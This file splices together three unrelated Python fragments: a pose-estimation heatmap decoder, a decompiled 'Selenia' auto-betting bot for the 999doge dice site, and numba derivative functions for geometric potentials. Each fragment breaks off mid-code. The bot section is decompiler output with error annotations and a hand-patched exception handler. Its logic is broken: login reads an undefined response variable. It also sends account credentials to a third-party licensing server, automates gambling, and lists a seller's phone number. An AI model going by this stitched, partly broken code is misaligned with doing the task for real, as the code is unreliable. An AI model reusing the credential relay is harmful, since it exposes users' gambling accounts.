x_index_min = np.max((x_index-1, 0))
x_index_max = np.min((x_index+1, self.heatmaps_nx-1))
for y_current in range(y_index_min, y_index_max+1):
for x_current in range(x_index_min, x_index_max+1):
index_current = len(KEYPOINTS)*(y_current * self.heatmaps_nx + x_current) + maxkeypoint
if (heatmaps_flat[index_current] > heatmaps_flat[index]) and (index_current != index):
return False
return True
def ParseOutput(self, output):
inference_time, output = output
outputs = [output[int(i):int(j)] for i, j in zip(self._output_offsets, self._output_offsets[1:])]
heatmaps = outputs[0].reshape(-1, len(KEYPOINTS))
offsets_short_y = outputs[1].reshape(-1, 2*len(KEYPOINTS))[:,0:len(KEYPOINTS)]
offsets_short_x = outputs[1].reshape(-1, 2*len(KEYPOINTS))[:,len(KEYPOINTS):2*len(KEYPOINTS)]
offsets_mid_fwd_y = outputs[2].reshape(-1, 4*len(poseChain))[:,0:len(poseChain)]
offsets_mid_fwd_x = outputs[2].reshape(-1, 4*len(poseChain))[:,len(poseChain):2*len(poseChain)]
offsets_mid_bwd_y = outputs[2].reshape(-1, 4*len(poseChain))[:,2*len(poseChain):3*len(poseChain)]
offsets_mid_bwd_x = outputs[2].reshape(-1, 4*len(poseChain))[:,3*len(poseChain):4*len(poseChain)]
heatmaps = self.logistic((heatmaps - self.quant_heatmaps_off)*self.quant_heatmaps_r)
heatmaps_flat = heatmaps.flatten()
offsets_short_y = (offsets_short_y - self.quant_offsets_short_off)*self.quant_offsets_short_r
offsets_short_x = (offsets_short_x - self.quant_offsets_short_off)*self.quant_offsets_short_r
offsets_mid_fwd_y = (offsets_mid_fwd_y - self.quant_offsets_mid_off)*self.quant_offsets_mid_r
offsets_mid_fwd_x = (offsets_mid_fwd_x - self.quant_offsets_mid_off)*self.quant_offsets_mid_r
offsets_mid_bwd_y = (offsets_mid_bwd_y - self.quant_offsets_mid_off)*self.quant_offsets_mid_r
offsets_mid_bwd_x = (offsets_mid_bwd_x - self.quant_offsets_mid_off)*self.quant_offsets_mid_r
# Obtaining the peaks of heatmaps larger than scoreThreshold
orderedindices = np.argsort(heatmaps_flat)[::-1]
largeheatmaps_indices = np.empty(0, dtype='int32')
for i in range(len(orderedindices)):
if heatmaps_flat[orderedindices[i]] < self.scoreThreshold:
break
if self.isPeak(heatmaps_flat, orderedindices[i]):
largeheatmaps_indices = np.append(largeheatmaps_indices, orderedindices[i])
pose_list = np.full(self.maxPoseDetections*2*len(KEYPOINTS), 0.0, dtype='float32').reshape(-1, len(KEYPOINTS), 2)
maxindex_list = np.full(self.maxPoseDetections*len(KEYPOINTS), -1, dtype='int32').reshape(-1, len(KEYPOINTS))
score_list = np.full(self.maxPoseDetections*len(KEYPOINTS), 0.0, dtype='float32').reshape(-1, len(KEYPOINTS))
pose_score_list = np.full(self.maxPoseDetections, 0.0, dtype='float32')
nPoses = 0
# obtaining at most maxPoseDetections poses
for point in range(len(largeheatmaps_indices)):
if nPoses >= self.maxPoseDetections:
break
# obtain a root canidate
maxindex = largeheatmaps_indices[point] // len(KEYPOINTS)
maxkeypoint = largeheatmaps_indices[point] % len(KEYPOINTS)
y = self.heatmaps_stride_y * (maxindex // self.heatmaps_nx)
x = self.heatmaps_stride_x * (maxindex % self.heatmaps_nx)
y += offsets_short_y[maxindex, maxkeypoint]
x += offsets_short_x[maxindex, maxkeypoint]
# skip keypoint with (x, y) that is close to the existing keypoints
skip = 0
for p in range(nPoses):
y_exist = pose_list[p, maxkeypoint, 0]
x_exist = pose_list[p, maxkeypoint, 1]
if (y_exist - y)*(y_exist - y) + (x_exist - x)*(x_exist - x) < self.sqRadius:
skip = 1
break
if skip == 1:
continue
# setting the maxkeypoint as root
pose_list[nPoses, maxkeypoint, 0] = y
pose_list[nPoses, maxkeypoint, 1] = x
maxindex_list[nPoses, maxkeypoint] = maxindex
score_list[nPoses, maxkeypoint] = heatmaps[maxindex, maxkeypoint]
# backward decoding
for edge in reversed(range(len(poseChain))):
sourceKeypointId = parentToChildEdges[edge]
targetKeypointId = childToParentEdges[edge]
if maxindex_list[nPoses, sourceKeypointId] != -1 and maxindex_list[nPoses, targetKeypointId] == -1:
maxindex = maxindex_list[nPoses, sourceKeypointId]
y = pose_list[nPoses, sourceKeypointId, 0]
x = pose_list[nPoses, sourceKeypointId, 1]
y += offsets_mid_bwd_y[maxindex, edge]
x += offsets_mid_bwd_x[maxindex, edge]
y_index = np.clip(round(y / self.heatmaps_stride_y), 0, self.heatmaps_ny-1)
x_index = np.clip(round(x / self.heatmaps_stride_x), 0, self.heatmaps_nx-1)
maxindex_list[nPoses, targetKeypointId] = self.heatmaps_nx*y_index + x_index
for i in range(self.offsetRefineStep):
y_index = np.clip(round(y / self.heatmaps_stride_y), 0, self.heatmaps_ny-1)
x_index = np.clip(round(x / self.heatmaps_stride_x), 0, self.heatmaps_nx-1)
maxindex_list[nPoses, targetKeypointId] = self.heatmaps_nx*y_index + x_index
y = self.heatmaps_stride_y * y_index
x = self.heatmaps_stride_x * x_index
y += offsets_short_y[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
x += offsets_short_x[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
pose_list[nPoses, targetKeypointId, 0] = y
pose_list[nPoses, targetKeypointId, 1] = x
score_list[nPoses, targetKeypointId] = heatmaps[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
# forward decoding
for edge in range(len(poseChain)):
sourceKeypointId = childToParentEdges[edge]
targetKeypointId = parentToChildEdges[edge]
if maxindex_list[nPoses, sourceKeypointId] != -1 and maxindex_list[nPoses, targetKeypointId] == -1:
maxindex = maxindex_list[nPoses, sourceKeypointId]
y = pose_list[nPoses, sourceKeypointId, 0]
x = pose_list[nPoses, sourceKeypointId, 1]
y += offsets_mid_fwd_y[maxindex, edge]
x += offsets_mid_fwd_x[maxindex, edge]
y_index = np.clip(round(y / self.heatmaps_stride_y), 0, self.heatmaps_ny-1)
x_index = np.clip(round(x / self.heatmaps_stride_x), 0, self.heatmaps_nx-1)
maxindex_list[nPoses, targetKeypointId] = self.heatmaps_nx*y_index + x_index
for i in range(self.offsetRefineStep):
y_index = np.clip(round(y / self.heatmaps_stride_y), 0, self.heatmaps_ny-1)
x_index = np.clip(round(x / self.heatmaps_stride_x), 0, self.heatmaps_nx-1)
maxindex_list[nPoses, targetKeypointId] = self.heatmaps_nx*y_index + x_index
y = self.heatmaps_stride_y * y_index
x = self.heatmaps_stride_x * x_index
y += offsets_short_y[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
x += offsets_short_x[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
pose_list[nPoses, targetKeypointId, 0] = y
pose_list[nPoses, targetKeypointId, 1] = x
score_list[nPoses, targetKeypointId] = heatmaps[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
# calclate pose score
score = 0
for k in range(len(KEYPOINTS)):
y = pose_list[nPoses, k, 0]
x = pose_list[nPoses, k, 1]
closekeypoint_exists = False
for p in range(nPoses):
y_exist = pose_list[p, k, 0]
x_exist = pose_list[p, | |
<filename>selenia/selenia.py
# Filenames : <EzzKun>
# Python bytecode : 3.8
# Time : Mon Sep 21 15:47:16 2020
# Selector <module> in line 1 file <EzzKun>
# Timestamp in code : 2020-09-18 02:01:53
#Instruction context:
#
# L. 551 964 POP_EXCEPT
# 966 BREAK_LOOP 970 'to 970'
#-> 968 END_FINALLY
# 970_0 COME_FROM 966 '966'
# 970_1 COME_FROM 956 '956'
import cloudscraper, sys, os, time, random, requests
from datetime import datetime
from config import *
headers = {'user-agent':'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.93 Mobile Safari/537.36',
'content-type':'application/x-www-form-urlencoded',
'accept':'/',
'x-requested-with':'com.reland.relandicebot',
'sec-fetch-site':'cross-site',
'sec-fetch-mode':'cors',
'accept-encoding':'gzip, deflate',
'accept-language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie':'lang=id'}
scr = cloudscraper.create_scraper()
url = 'https://www.999doge.com/api/web.aspx'
birutua = '\x1b[0;34m'
putih = '\x1b[0m'
kuning = '\x1b[1;33m'
hijau = '\x1b[1;32m'
merah = '\x1b[1;31m'
biru = '\x1b[0;36m'
ungu = '\x1b[1;35m'
bghijau_white = '\x1b[5;37;42m'
bgmerah_black = '\x1b[5;37;41m'
num_format = '{:.8f}'.format
num_PayIn = '{:0>1.0f}'.format
Username = account['Username']
Password = account['Password']
BaseTrade = float(tradeset['BaseTrade'])
C1 = float(tradeset['C1'])
C2 = float(tradeset['C2'])
TC1 = int(tradeset['TradeCount_1'])
TC2 = int(tradeset['TradeCount_2'])
if TC1 > 200 or (TC2 > 200):
print('Number Of Trade Out of Limit')
sys.exit()
IncreaseOnWinPercent = str(tradeset['MultiplyOnWin'])
if IncreaseOnWinPercent == '0':
ResetOnWin = 1
else:
ResetOnWin = 0
IncreaseOnLosePercent = str(tradeset['MultiplyOnLose'])
if IncreaseOnLosePercent == '0':
ResetOnLose = 1
else:
ResetOnLose = 0
MaxBase = tradeset['MaxBaseTrade']['Toogle']
if MaxBase == 'ON':
MaxBaseTrade = float(tradeset['MaxBaseTrade']['Max']) * 100000000
if tradeset['MaxBaseTrade']['ResetOnLoseMaxTrade'] == 'ON':
ResetOnLoseMaxTrade = 1
else:
ResetOnLoseMaxTrade = 0
if tradeset['MaxBaseTrade']['StopOnLoseMaxTrade'] == 'ON':
StopOnLoseMaxTrade = 1
else:
StopOnLoseMaxTrade = 0
elif MaxBase == 'OFF':
MaxBaseTrade = 0
ResetOnLoseMaxTrade = 0
StopOnLoseMaxTrade = 0
ForceTC1AfterLose = tools['ForceTC1AfterLose']
ChangeTCAfterLose = tools['ChangeTCAfterLose']['Toogle']
TargetProfit = float(tools['TargetProfit'])
ClientSeed = int(tradeset['ClientSeed'])
RecoveryMultiplier = float(tools['RecoveryMultiplier'])
RecoveryIncrease = float(tools['RecoveryIncrease'])
AddDelayTrade = float(tools['AddDelayTrade'])
AddDelayTradeWin = float(tools['AddDelayTradeWin'])
AddDelayTradeLose = float(tools['AddDelayTradeLose'])
StopLoseBalance = float(tools['StopLoseBalance'])
ContinueLastBase = tools['ContinueLastBase']
SmartRecovery = tools['SmartRecovery']
def withdraw():
amt = input('Witdraw Amount (0 = withdraw all) : ')
Address = input('Wallet : ')
Amount = int(amt) * 100000000
otp = input('2FA Code (IF Enabled): ')
withdraw_data = 'a=Withdraw&s=' + ses + '&Amount=' + str(Amount) + '&Address=' + Address + '&Totp=' + otp + '&Currency=doge'
withdraw = scr.post(url, data=withdraw_data, headers=headers).json()
try:
if withdraw['Pending']:
print(hijau + 'Success Pending' + putih)
input('')
except:
pass
try:
if withdraw['TooSmall']:
print(hijau + 'Minimum 2 DOGE' + putih)
input('')
except:
pass
def harga_license():
print('Price List License SELENIA TRADEBOT')
print(hijau + '~Premium~' + putih)
print(biru + '[1] 14 Days - 15K IDR SG SERVER - 1 USER - MULTI DEVICE')
print('[2] 30 Days - 25K - IDR SG SERVER - 1 USER - MULTI DEVICE')
print(hijau + '~Platinum~' + putih)
print(biru + '[1] 14 Days - ̶2̶5̶K > 15K - SG SERVER - MULTI USER - MULTI DEVICE')
print('[2] 30 Days - ̶3̶5̶K > 20K - SG SERVER - MULTI USER - MULTI DEVICE' + putih)
print(kuning + 'Price Valid Until 24/09/2020')
print('Contact Admin :')
print('Whatsapp/Telegram : +6283153942438')
print('*Chat Only*')
input('Enter' + putih)
def post(data):
req = requests.post(url, data=data, headers=headers).json()
return req
def login():
otp = ''
data = {'username':Username,
'password':Password}
url_get = 'http://layscape.xyz/selenia/getuser.php'
getid = scr.post(url_get, data=data).json()
if getid['status'] == 'Berhasil':
pass
else:
print(merah + getid['status'] + putih)
sys.exit()
otp = input('2FA Code (If Enabled) : ')
login = 'a=Login&Key=<KEY>&Username=' + getid['username'] + '&Password=' + getid['password'] + '&Totp=' + otp
try:
post(login)
ses = req['SessionCookie']
refer = req['ReferredById']
dogebalance = req['Doge']['Balance'] / 100000000
accid = req['AccountId']
print(hijau + 'Login Success')
statslogin = 'Online'
getwalletdoge = 'a=GetDepositAddress&s=' + ses + '&Currency=doge'
post(getwalletdoge)
dogewallet = req['Address']
time.sleep(2)
except Exception as e:
try:
print(e)
print(merah + 'Check Username or Password')
sys.exit()
finally:
e = None
del e
else:
return getid
# Filenames : <EzzKun>
# Python bytecode : 3.8
# Time : Sun Sep 20 17:46:07 2020
# Selector autobet in line 171 file <EzzKun>
# Timestamp in code : 2020-07-16 04:45:22
def autobet(x):
win = 0
lose = 0
wins = 0
loses = 0
delay = 0
MaxPayIns = 0
MaxBase = 0
MaxPayOuts = 0
TotalProfit = 0
ProfitSementara = 0
PayIn = 0
LProfit = 0
if BaseTrade >= float(1e-08) and BaseTrade < float(0.0001):
delay = 2
elif BaseTrade >= float(0.0001) and BaseTrade < float(0.001):
delay = 1
elif BaseTrade >= float(0.001) and BaseTrade < float(0.01):
delay = 0.5
elif BaseTrade >= float(0.01):
delay = 0
if x > 150:
print(hijau + 'Please Buy License')
print(kuning + 'Max Balance For Free Is 150 Doge', putih)
sys.exit()
else:
print(hijau + 'Start Trading' + putih)
time.sleep(2)
os.system('clear')
if BaseTrade > 0:
PayIn = BaseTrade * int(100000000)
else:
PayIn = BaseTrade / int(100000000)
Profit = 0
NumberOfTrade = random.randint(TC1, TC2)
while True:
try:
if TotalProfit < TargetProfit:
time.sleep(AddDelayTrade)
ch = round(random.uniform(C2, C1), 2)
Low = int(1000000) - ch * int(10000)
PlaceAutoBets = {'a':'PlaceAutomatedBets',
's':ses,
'BasePayIn':num_PayIn(int(PayIn)),
'Low':int(Low),
'High':'999999',
'MaxBets':int(NumberOfTrade),
'ResetOnWin':ResetOnWin,
'ResetOnLose':ResetOnLose,
'IncreaseOnWinPercent':str(IncreaseOnWinPercent),
'IncreaseOnLosePercent':str(IncreaseOnLosePercent),
'MaxPayIn':int(MaxBaseTrade),
'ResetOnLoseMaxBet':int(ResetOnLoseMaxTrade),
'StopOnLoseMaxBet':int(StopOnLoseMaxTrade),
'ClientSeed':int(ClientSeed),
'Currency':Currency,
'ProtocolVersion':'2'}
post(PlaceAutoBets)
try:
if int(req['InsufficientFunds']) == 1:
print('\n\nInsufficient Funds')
input('Enter')
else:
pass
except:
print('hello') # my modificated, to skip parserror
else: # -> this is nothing
BetCount = len(req['PayIns']) # -> exception return to this
PayIns = sum(req['PayIns'])
PayOuts = sum(req['PayOuts'])
if MaxPayIns > PayIns:
MaxPayIns = PayIns
count_profit = PayOuts + PayIns
if MaxPayOuts > count_profit:
MaxPayOuts = count_profit
Profit += count_profit
TotalProfit = Profit / 100000000
if PayOuts > 0 and count_profit > 0:
win += 1
lose = 0
if wins < win:
wins += 1
print(bghijau_white + 'TC:', BetCount, 'TradeIn:', num_format(PayIns / -100000000) + ' TradeProfit:', ' ' + num_format(count_profit / 100000000) + putih)
print(hijau, 'Profit :', (num_format(Profit / 100000000) + putih), (hijau + '[W]' + str(win) + ':' + str(wins) + merah), ('[L]' + str(lose) + ':' + str(loses) + putih), end='\r')
if BaseTrade > 0:
PayIn = BaseTrade * int(100000000)
NumberOfTrade = random.randint(TC1, TC2)
else:
PayIn = BaseTrade / int(100000000)
NumberOfTrade = random.randint(TC1, TC2)
if SmartRecovery == 'ON':
LProfit += count_profit
if LProfit > 0:
LProfit = 0
if BaseTrade > 0:
PayIn = BaseTrade * int(100000000)
NumberOfTrade = random.randint(TC1, TC2)
else:
LProfit += Profit
PayIn = BaseTrade / int(100000000)
NumberOfTrade = random.randint(TC1, TC2)
else:
LProfit += count_profit
if ContinueLastBase == 'ON':
PayIn = (req['PayIns'][(-1)] + RecoveryIncrease) * RecoveryMultiplier
else:
PayIn = (req['PayIns'][0] + RecoveryIncrease) * RecoveryMultiplier
if MaxBase == 'ON':
MaxBaseTrade = (MaxBaseTrade + RecoveryIncrease) * RecoveryMultiplier
elif MaxBase == 'OFF':
MaxBaseTrade = 0
if ForceTC1AfterLose == 'ON':
NumberOfTrade = 1
elif ForceTC1AfterLose == 'OFF':
NumberOfTrade = random.randint(TC1, TC2)
if ChangeTCAfterLose == 'ON':
NumberOfTrade = tools['ChangeTCAfterLose']['ChangeTo']
else:
pass
if MaxBase == 'ON':
MaxBaseTrade = float(tradeset['MaxBaseTrade']['Max']) * 100000000
elif MaxBase == 'OFF':
MaxBaseTrade = 0
time.sleep(AddDelayTradeWin)
else:
win = 0
lose += 1
LProfit += count_profit
if loses < lose:
loses += 1
print(bgmerah_black + 'TC:', BetCount, 'TradeIn:', num_format(PayIns / -100000000) + ' TradeProfit:', num_format(count_profit / 100000000) + putih)
print(hijau, 'Profit :', (num_format(Profit / 100000000) + putih), (hijau + '[W]' + str(win) + ':' + str(wins) + merah), ('[L]' + str(lose) + ':' + str(loses) + putih), end='\r')
if ContinueLastBase == 'ON':
PayIn = (req['PayIns'][(-1)] + RecoveryIncrease) * RecoveryMultiplier
else:
PayIn = (req['PayIns'][0] + RecoveryIncrease) * RecoveryMultiplier
if MaxBase == 'ON':
MaxBaseTrade = (MaxBaseTrade + RecoveryIncrease) * RecoveryMultiplier
elif MaxBase == 'OFF':
MaxBaseTrade = 0
if ForceTC1AfterLose == 'ON':
NumberOfTrade = 1
elif ForceTC1AfterLose == 'OFF':
NumberOfTrade = random.randint(TC1, TC2)
if ChangeTCAfterLose == 'ON':
NumberOfTrade = tools['ChangeTCAfterLose']['ChangeTo']
else:
pass
time.sleep(AddDelayTradeLose)
time.sleep(delay)
if Profit < float(StopLoseBalance):
print(merah + '\nStop Lose Tercapai' + putih)
sys.exit()
print('\nTrading Complete\nTrade Summary:')
print(kuning + 'Profit :', num_format(Profit / 100000000))
print('Higher TradeIn :', num_format(MaxPayIns / -100000000))
print('Higher PayOut :', num_format(MaxPayOuts / 100000000))
except Exception as e:
try:
print(e)
input('Enter')
finally:
e = None
#Instruction context error:
#->
# L. 247 482 POP_EXCEPT
# 484 BREAK_LOOP 488 'to 488'
# 486 END_FINALLY
# 488_0 COME_FROM 484 '484'
# 488_1 COME_FROM 474 '474'
def ainfo():
url_login = 'https://www.999doge.com/api/web.aspx'
dlogin = 'a=Login&Key=<KEY>&Username=' + getid['username'] + '&Password=' + getid['password'] + '&Totp='
login = scr.post(url_login, data=dlogin, headers=headers).json()
seswallet = login['SessionCookie']
getwalletdoge = 'a=GetDepositAddress&s=' + seswallet + '&Currency=doge'
pwalletdoge = scr.post(url_login, data=getwalletdoge, headers=headers)
login = scr.post(url_login, data=dlogin, headers=headers).json()
dogbal = login['Doge']['Balance'] / 100000000
depodog = login['Doge']['DepositAddress']
depoltc = login['LTC']['DepositAddress']
depoeth = login['ETH']['DepositAddress']
depobtc = login['DepositAddress']
accid = login['AccountId']
print('Account Information:')
print('ID :', | |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 16:18:19 2017
Numerical values for derivatives of the potentials
@author: amit
"""
from numba import jit, f8
from numpy import sqrt, array, cos, sin
"""
Derivative of co-planarity potential wrt vi
"""
@jit( f8[:](f8[:], f8[:], f8[:]), cache=True, nopython=True )
def Dphi_pDvi(vi, xi, xj):
u0,u1,u2 = vi
x0,x1,x2 = xi
y0,y1,y2 = xj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vi_mag = sqrt(vi_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
cos_alpha_i = cos( 0.5*vi_mag )
Dphi_pDu0 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2) + (-x2 + y2)*(cos_alpha_i**2 -\
sin_alpha_i**2*u0**2/vi_mag**2 - sin_alpha_i**2*u1**2/vi_mag**2 +\
sin_alpha_i**2*u2**2/vi_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u0*u1/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 -\
4*sin_alpha_i**2*u0**2*u2/vi_mag**4 -\
sin_alpha_i**2*u0*u1/vi_mag**2 + 2*sin_alpha_i**2*u2/vi_mag**2) +\
2*(-x1 + y1)*(-cos_alpha_i**2*u0**2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i/vi_mag + sin_alpha_i**2*u0**2/vi_mag**2 -\
4*sin_alpha_i**2*u0*u1*u2/vi_mag**4) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**3/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u0*u1**2/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u0**3/vi_mag**4 + \
2*sin_alpha_i**2*u0*u1**2/vi_mag**4 -\
2*sin_alpha_i**2*u0*u2**2/vi_mag**4 -\
2*sin_alpha_i**2*u0/vi_mag**2))
Dphi_pDu1 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2) + (-x2 + y2)*(cos_alpha_i**2 -\
sin_alpha_i**2*u0**2/vi_mag**2 - sin_alpha_i**2*u1**2/vi_mag**2 +\
sin_alpha_i**2*u2**2/vi_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u1**2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i/vi_mag -\
4*sin_alpha_i**2*u0*u1*u2/vi_mag**4 -\
sin_alpha_i**2*u1**2/vi_mag**2) + 2*(-x1 + y1)*(-\
cos_alpha_i**2*u0*u1/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
sin_alpha_i**2*u0*u1/vi_mag**2 -\
4*sin_alpha_i**2*u1**2*u2/vi_mag\
**4 + 2*sin_alpha_i**2*u2/vi_mag**2) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**2*u1/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1**3/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0**2*u1/vi_mag**4 +\
2*sin_alpha_i**2*u1**3/vi_mag**4 -\
2*sin_alpha_i**2*u1*u2**2/vi_mag**4 -\
2*sin_alpha_i**2*u1/vi_mag**2))
Dphi_pDu2 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2) + (-x2 + y2)*(cos_alpha_i**2 -\
sin_alpha_i**2*u0**2/vi_mag**2 - sin_alpha_i**2*u1**2/vi_mag**2 +\
sin_alpha_i**2*u2**2/vi_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u1*u2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1*u2/vi_mag**3 -\
4*sin_alpha_i**2*u0*u2**2/vi_mag**4 + 2*sin_alpha_i**2*u0/vi_mag**2 -\
sin_alpha_i**2*u1*u2/vi_mag**2) + 2*(-x1 + y1)*(-\
cos_alpha_i**2*u0*u2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 +\
sin_alpha_i**2*u0*u2/vi_mag**2 -\
4*sin_alpha_i**2*u1*u2**2/vi_mag\
**4 + 2*sin_alpha_i**2*u1/vi_mag**2) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u2**3/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u2/vi_mag +\
2*sin_alpha_i**2*u0**2*u2/vi_mag**4 +\
2*sin_alpha_i**2*u1**2*u2/vi_mag**4 -\
2*sin_alpha_i**2*u2**3/vi_mag**4 + 2*sin_alpha_i**2*u2/vi_mag**2))
return array([Dphi_pDu0,Dphi_pDu1,Dphi_pDu2])
"""
Derivative of co-normality potential wrt vi
"""
@jit( f8[:](f8[:], f8[:]), cache=True, nopython=True )
def Dphi_nDvi(vi, vj):
u0,u1,u2 = vi
v0,v1,v2 = vj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vj_mag_sqr = v0**2 + v1**2 + v2**2
vi_mag = sqrt(vi_mag_sqr)
vj_mag = sqrt(vj_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
sin_alpha_j = sin( 0.5*vj_mag )
cos_alpha_i = cos( 0.5*vi_mag )
cos_alpha_j = cos( 0.5*vj_mag )
Dphi_nDu0 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(-\
2*cos_alpha_i**2*u0**2/vi_mag**2 + 4*\
cos_alpha_i*sin_alpha_i*u0**2/vi_mag**3 +\
4*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
4*cos_alpha_i*sin_alpha_i/vi_mag + 2*sin_alpha_i**2*u0**2/vi_mag**2 -\
8*sin_alpha_i**2*u0*u1*u2/vi_mag**4) +\
(2*cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(2*cos_alpha_i**2*u0*u1/vi_mag**2 +\
4*cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
4*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 -\
8*sin_alpha_i**2*u0**2*u2/vi_mag**4 -\
2*sin_alpha_i**2*u0*u1/vi_mag**2 + 4*sin_alpha_i**2*u2/vi_mag**2) +\
(cos_alpha_i**2 - cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(-\
2*cos_alpha_i*sin_alpha_i*u0**3/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u0*u1**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
4*sin_alpha_i**2*u0**3/vi_mag**4 +\
4*sin_alpha_i**2*u0*u1**2/vi_mag**4 -\
4*sin_alpha_i**2*u0*u2**2/vi_mag**4 -\
4*sin_alpha_i**2*u0/vi_mag**2)
Dphi_nDu1 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(-\
2*cos_alpha_i**2*u0*u1/vi_mag**2 + 4*\
cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 +\
4*cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
2*sin_alpha_i**2*u0*u1/vi_mag**2 -\
8*sin_alpha_i**2*u1**2*u2/vi_mag**4 +\
4*sin_alpha_i**2*u2/vi_mag**2) + (2*\
cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(2*cos_alpha_i**2*u1**2/vi_mag**2 +\
4*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
4*cos_alpha_i*sin_alpha_i*u1**2/vi_mag**3 +\
4*cos_alpha_i*sin_alpha_i/vi_mag -\
8*sin_alpha_i**2*u0*u1*u2/vi_mag**4 -\
2*sin_alpha_i**2*u1**2/vi_mag**2) + (cos_alpha_i**2 -\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(-\
2*cos_alpha_i*sin_alpha_i*u0**2*u1/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1**3/vi_mag**3 +\
